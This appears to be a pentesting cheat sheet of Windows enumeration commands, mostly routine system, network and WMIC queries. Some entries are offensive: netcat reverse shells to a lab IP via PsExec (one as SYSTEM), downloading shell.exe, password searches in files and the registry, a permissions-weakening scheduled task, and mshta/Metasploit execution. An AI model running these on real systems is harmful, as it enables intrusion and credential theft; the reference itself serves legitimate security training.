Hooper Labs

Windows Enumeration

System

List System Info

	systeminfo

Hostname

	hostname

OS Version

	ver

Users

Prints username

	echo %username% 

Display All User Info

	whoami /all 

Env Variables Beginning with "U"

	SET U All

Add User

	net user   /add

Add User to Group

	net localgroup administrators /add 

Add User to Domain Group

	net group "HR Admins" myUser /add /domain

Network

Network Interfaces

	ipconfig /all  

Routing Table

	route

ARP Table

	arp -A 

All Open Connections

	netstat -ano

Firewall State

	netsh firewall show state firewall state 

Firewall Config

	netsh firewall show config firewall config 

List Computers In Current Domain

	net view

List Users

	net users 

List User Info

	net user user1 

Unk

	net config

Processes, Services, Drivers

Scheduled Tasks

	schtasks /query /fo LIST /v 

Delete Scheduled Task

	SCHTASKS /Delete /TN SERVERQR /F

Create Scheduled Task

	SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts\*.exe /G everyone:f"

Processes + Services

	tasklist /SVC

Terminate Process

	taskkill /PID pid

Kill Process forcefully by imagename

	taskkill /F /IM wscript.exe

Running Services

	net start

Query Service Config

	sc qc [service_name]

Service Info

	sc queryex state= 

List Drivers

	DRIVERQUERY

Searching Files

PDF Search

	dir /a /s /b c:\'.pdf' 

Search for Patches

	dir /a /b c:\windows\kb' 

Search for Passwords

	findstr /si password *.txt *.xml *.xls *.ini *.infrecursively from current directory 

Search for filenames with password

	dir /s *pass* == *cred* == *vnc* == *.config*

Search registry for password

	reg query HKLM /f password /t REG_SZ /s | reg query HKCU /f password /t REG_SZ /s | reg query HKLM /v password /t REG_SZ /s 

View Remote Files

	dir \\IP.ADD.RE.SS\C$

Misc

Enum Domain Info

	dsquery

Run As Different User

	runas /u:Administrator cmd.exe

Copy output to Clipboard

	| clip

Check File Permissions

	cacls 

Check File Permissions

	icacls

List Dirs and Owners

	dir /q 

Open Webpage

	explorer.exe http://10.11.0.187/index.html

Installed Updates (Hotfixes)

	wmic qfe get Caption,Description,HotFixID,InstalledOn

Kill Processes with Known ExecutablePath

	wmic process where ExecutablePath='C:\\Windows\Fonts\\svhost.exe' delete

Powershell

Download Page

	powershell -command "& {&'wget' http://10.11.0.187/shell.exe -OutFile shell.exe}"  

Runas Equivalent

	PsExec.exe /accepteula  -u  -p  nc.exe -nv 10.11.0.187 8888 -e cmd.exe 

Get System Privileges

	PsExec.exe /accepteula -i -d -s nc.exe -nv 10.11.0.187 8889 -e cmd.exe

Wget Equivalent

	Invoke-WebRequest -uri  -OutFile C:\Windows\TEMP\outfile.txt

System Internal Suite Notes

Accept EULA

	accesschk.exe /accepteula 

Check Auto Runs

	Autorunsc.exe /accepteula

Check File Privs

	C:\Users\Public\accesschk64.exe /accepteula * 

Check Process Privs

	accesschk.exe -vqp *

Find Permissions

	accesschk.exe -uwdqs users c:\ 

Find Permissions

	accesschk.exe -uwdqs "Authenticated Users" c:\ 

Find Permissions

	accesschk.exe -uwqs users c:\*.* 

Find Permissions

	accesschk.exe -uwqs "Authenticated Users" c:\*.* 

Find Permissions

	cacls "c:\Program Files" /T | findstr Users

Stop network traffic to domain

	echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts

Take Ownership of a File

	takeown /F file.txt

MSHTA.exe Code Execution

	Start metasploit server (exploit/windows/misc/hta_server).  Then, run "mshta.exe //<ip-addr>/random.hta" on the host machine.

Temporary Folder (System)

	C:\Windows\Temp

Temporary Folder (User)

	%USERPROFILE%\AppData\Local\

WMIC

List Groups

	wmic group list brief

List Hotfixes

	wmic qfe list brief

Desktop Information

	wmic desktop list brief

CD Information

	wmic cdrom list brief

NIC Information

	wmic nic list brief

Control Output of wmic Command

	wmic process get name,processid

Close a Program

	wmic process where processid="1000" call terminate

Close a Remote Program

	wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate

Turn on RemoteDesktop

	-wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1

LogicalDisk Free Space

	wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV

List all Shares

	wmic logicaldisk get name,providername

List Startup Processes

	wmic startup get caption,command,user

Run wmic Remotely

	wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started

Lolbas

Make HTTP Request (Download a file)

	certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

Open remote Office document

	"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"

List Shadow Copies

List all autorun programs in XML format

	autorunsc.exe -x > autoruns.xml

List all non-microsoft autoruns in CSV format

	autorunsc.exe -m -v 

List audit policy

	auditpol /get /category:*

Turn on an audit policy

	auditpol /set /subcategory:"Logon" /success:enable